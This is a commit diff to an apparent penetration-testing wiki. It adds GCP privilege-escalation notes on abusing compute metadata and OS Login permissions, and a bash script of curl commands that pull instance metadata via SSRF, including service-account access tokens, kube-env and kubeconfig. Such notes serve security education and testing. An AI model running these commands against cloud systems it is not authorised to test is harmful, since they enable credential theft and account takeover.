GitBook: [#3008] No subject

2022-02-13 16:34:45 +00:00 · 2022-02-13 16:34:45 +00:00 · 3aea4c400a
parent 19f982fe32
commit 3aea4c400a
4 changed files with 125 additions and 41 deletions
--- a/SUMMARY.md
+++ b/SUMMARY.md
@ -497,7 +497,6 @@
 ## Cloud Security

 * [GCP Security](cloud-security/gcp-security/README.md)
-  * [GCP - Local Privilege Escalation / SSH Pivoting](cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md)
  * [GCP - Other Services Enumeration](cloud-security/gcp-security/gcp-looting.md)
  * [GCP - Abuse GCP Permissions](cloud-security/gcp-security/gcp-interesting-permissions/README.md)
    * [GCP - Privesc to other Principals](cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md)
@ -509,6 +508,7 @@
  * [GCP - Databases Enumeration](cloud-security/gcp-security/gcp-databases-enumeration.md)
  * [GCP - Serverless Code Exec Services Enumeration](cloud-security/gcp-security/gcp-serverless-code-exec-services-enumeration.md)
  * [GCP - Buckets Enumeration](cloud-security/gcp-security/gcp-buckets-enumeration.md)
+  * [GCP - Local Privilege Escalation / SSH Pivoting](cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md)
 * [Github Security](cloud-security/github-security/README.md)
  * [Basic Github Information](cloud-security/github-security/basic-github-information.md)
 * [Kubernetes Security](pentesting/pentesting-kubernetes/README.md)
--- a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md
+++ b/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md
@ -154,6 +154,38 @@ For a more in-depth explanation visit [https://rhinosecuritylabs.com/gcp/iam-pri

 **Potentially** with this permission you will be able to **update a cloud build and just steal the service account token** like it was performed with the previous permission (but unfortunately at the time of this writing I couldn't find any way to call that API).

+## compute
+
+### compute.projects.setCommonInstanceMetadata
+
+With that permission you can **modify** the **metadata** information of an **instance** and change the **authorized keys of a user**, or **create** a **new user with sudo** permissions. Therefore, you will be able to exec via SSH into any VM instance and steal the GCP Service Account the Instance is running with.\
+Limitations:
+
+* Note that GCP Service Accounts running in VM instances by default have a **very limited scope**
+* You will need to be **able to contact the SSH** server to login
+
+For more information about how to exploit this permission check:
+
+{% content-ref url="../gcp-local-privilege-escalation-ssh-pivoting.md" %}
+[gcp-local-privilege-escalation-ssh-pivoting.md](../gcp-local-privilege-escalation-ssh-pivoting.md)
+{% endcontent-ref %}
+
+### compute.instances.setMetadata
+
+This permission gives the **same privileges as the previous permission** but over a specific instances instead to a whole project. The **same exploits and limitations applies**.
+
+### compute.instances.setIamPolicy
+
+This kind of permission will allow you to **grant yourself a role with the previous permissions** and escalate privileges abusing them.
+
+### **compute.instances.osLogin**
+
+If OSLogin is enabled in the instance, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You won't have root privs inside the instance.
+
+### **compute.instances.osAdminLogin**
+
+If OSLogin is enabled in the instance, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You will have root privs inside the instance.
+
 ## container

 ### container.clusters.get
--- a/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md
+++ b/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md
@ -48,8 +48,6 @@ Although Google [recommends](https://cloud.google.com/compute/docs/access/servic
 * `https://www.googleapis.com/auth/compute`
 * `https://www.googleapis.com/auth/cloud-platfo`rm

-## **Add SSH keys**&#x20;
-
 ### **Add SSH keys to custom metadata**

 **Linux** **systems** on GCP will typically be running [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts) scripts. One of these is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which **periodically** **queries** the instance metadata endpoint for **changes to the authorized SSH public keys**.
@ -149,26 +147,7 @@ gcloud compute ssh [INSTANCE NAME]

 This will **generate a new SSH key, add it to your existing user, and add your existing username to the `google-sudoers` group**, and start a new SSH session. While it is quick and easy, it may end up making more changes to the target system than the previous methods.

-## **Using OS Login**
-
-[OS Login](https://cloud.google.com/compute/docs/oslogin/) is an alternative to managing SSH keys. It links a **Google user or service account to a Linux identity**, relying on IAM permissions to grant or deny access to Compute Instances.
-
-OS Login is [enabled](https://cloud.google.com/compute/docs/instances/managing-instance-access#enable\_oslogin) at the project or instance level using the metadata key of `enable-oslogin = TRUE`.
-
-OS Login with two-factor authentication is [enabled](https://cloud.google.com/compute/docs/oslogin/setup-two-factor-authentication) in the same manner with the metadata key of `enable-oslogin-2fa = TRUE`.
-
-The following two **IAM permissions control SSH access to instances with OS Login enabled**. They can be applied at the project or instance level:
-
-* **roles/compute.osLogin** (no sudo)
-* **roles/compute.osAdminLogin** (has sudo)
-
-Unlike managing only with SSH keys, these permissions allow the administrator to control whether or not `sudo` is granted.
-
-If your service account has these permissions. **You can simply run the `gcloud compute ssh [INSTANCE]`** command to [connect manually as the service account](https://cloud.google.com/compute/docs/instances/connecting-advanced#sa\_ssh\_manual). **Two-factor** is **only** enforced when using **user accounts**, so that should not slow you down even if it is assigned as shown above.
-
-Similar to using SSH keys from metadata, you can use this strategy to **escalate privileges locally and/or to access other Compute Instances** on the network.
-
-## SSH keys at project level <a href="#sshing-around" id="sshing-around"></a>
+### SSH keys at project level <a href="#sshing-around" id="sshing-around"></a>

 Following the details mentioned in the previous section you can try to compromise more VMs.

@ -180,6 +159,25 @@ gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt

 If you're really bold, you can also just type `gcloud compute ssh [INSTANCE]` to use your current username on other boxes.

+## **Using OS Login**
+
+****[**OS Login**](https://cloud.google.com/compute/docs/oslogin/) **** is an alternative to managing SSH keys. It links a **Google user or service account to a Linux identity**, relying on IAM permissions to grant or deny access to Compute Instances.
+
+OS Login is [enabled](https://cloud.google.com/compute/docs/instances/managing-instance-access#enable\_oslogin) at the project or instance level using the metadata key of `enable-oslogin = TRUE`.
+
+OS Login with two-factor authentication is [enabled](https://cloud.google.com/compute/docs/oslogin/setup-two-factor-authentication) in the same manner with the metadata key of `enable-oslogin-2fa = TRUE`.
+
+The following two **IAM permissions control SSH access to instances with OS Login enabled**. They can be applied at the project or instance level:
+
+* **compute.instances.osLogin** (no sudo)
+* **compute.instances.osAdminLogin** (has sudo)
+
+Unlike managing only with SSH keys, these permissions allow the administrator to control whether or not `sudo` is granted.
+
+If your service account has these permissions. **You can simply run the `gcloud compute ssh [INSTANCE]`** command to [connect manually as the service account](https://cloud.google.com/compute/docs/instances/connecting-advanced#sa\_ssh\_manual). **Two-factor** is **only** enforced when using **user accounts**, so that should not slow you down even if it is assigned as shown above.
+
+Similar to using SSH keys from metadata, you can use this strategy to **escalate privileges locally and/or to access other Compute Instances** on the network.
+
 ## Search for Keys in the filesystem

 It's quite possible that **other users on the same box have been running `gcloud`** commands using an account more powerful than your own. You'll **need local root** to do this.
--- a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
+++ b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
@ -92,21 +92,81 @@ Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACC

 ### SSRF URL for Google Cloud <a href="#6440" id="6440"></a>

-Requires the header “Metadata-Flavor: Google” or “X-Google-Metadata-Request: True”
+Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" and you can access the metadata endpoint in with the following URLs:

-```
-http://169.254.169.254/computeMetadata/v1/
-http://metadata.google.internal/computeMetadata/v1/
-http://metadata/computeMetadata/v1/
-http://metadata.google.internal/computeMetadata/v1/instance/hostname
-http://metadata.google.internal/computeMetadata/v1/instance/id
-http://metadata.google.internal/computeMetadata/v1/project/project-id
-```
+* http://169.254.169.254
+* http://metadata.google.internal
+* http://metadata

-Google allows recursive pulls
+Interesting endpoints to extract information:

-```
-http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true
+```bash
+# /project
+## Project name and number
+curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/project/project-id
+curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/project/numeric-project-id
+## Project attributes
+curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/project/attributes/?recursive=true
+
+# /oslogin
+## users
+curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/oslogin/users
+## groups
+curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/oslogin/groups
+## security-keys
+curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/oslogin/security-keys
+## authorize
+curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/oslogin/authorize
+
+# /instance
+## Description
+curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/description
+## Hostname
+curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/hostname
+## ID
+curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/id
+## Image
+curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/image
+## Machine Type
+curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/machine-type
+## Name
+curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/name
+## Tags
+curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/scheduling/tags
+## Zone
+curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/zone
+## Network Interfaces
+for iface in $(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/"); do 
+    echo "  IP: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/ip")
+    echo "  Subnetmask: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/subnetmask")
+    echo "  Gateway: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/gateway")
+    echo "  DNS: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/dns-servers")
+    echo "  Network: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/network")
+    echo "  ==============  "
+done
+## Service Accounts
+for sa in $(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"); do 
+    echo "  Name: $sa"
+    echo "  Email: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/email")
+    echo "  Aliases: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/aliases")
+    echo "  Identity: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/identity")
+    echo "  Scopes: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/scopes")
+    echo "  Token: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/token")
+    echo "  ==============  "
+done
+## K8s Attributtes
+### Cluster location
+curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/cluster-location
+### Cluster name
+curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/cluster-name
+### Os-login enabled
+curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/enable-oslogin
+### Kube-env
+curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/kube-env
+### Kube-labels
+curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/kube-labels
+### Kubeconfig
+curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/kubeconfig
 ```

 Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn)
@ -116,12 +176,6 @@ http://metadata.google.internal/computeMetadata/v1beta1/
 http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
 ```

-Interesting files to pull out:
-
-* SSH Public Key : [`http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json`](http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json)
-* Get Access Token : [`http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token`](http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token)
-* Kubernetes Key : [`http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json`](http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json)
-
 ### Add an SSH key <a href="#3e24" id="3e24"></a>

 Extract the token